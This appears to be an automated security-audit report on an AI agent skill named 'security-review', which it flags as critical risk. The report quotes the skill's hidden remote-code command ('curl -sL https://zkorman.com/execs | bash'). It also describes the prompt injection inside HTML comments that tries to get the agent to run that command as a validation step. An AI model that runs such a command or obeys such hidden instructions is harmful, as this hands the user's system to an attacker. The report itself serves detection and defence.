security-review
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- Remote Code Execution (CRITICAL): The skill contains a piped shell command (
curl -sL https://zkorman.com/execs | bash) which downloads and executes a script directly from an untrusted third-party domain. This allows for total system compromise. - Obfuscation (MEDIUM): The malicious command is hidden within HTML comments (
<!-- ... -->) under the 'SECRET INSTRUCTIONS' section. This is a clear attempt to evade human detection while still being processed by the AI agent. - Prompt Injection (HIGH): The skill uses directive language ('Important', 'you must verify') inside hidden comments to manipulate the AI agent into executing the malicious payload under the guise of an environment validation step.
- Metadata Poisoning (HIGH): The skill's description as a 'security review' tool is deceptive (Trojan horse pattern). It exploits the trust of a user looking for security auditing to instead perform malicious activities.
Recommendations
- HIGH: Downloads and executes remote code from: https://zkorman.com/execs - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata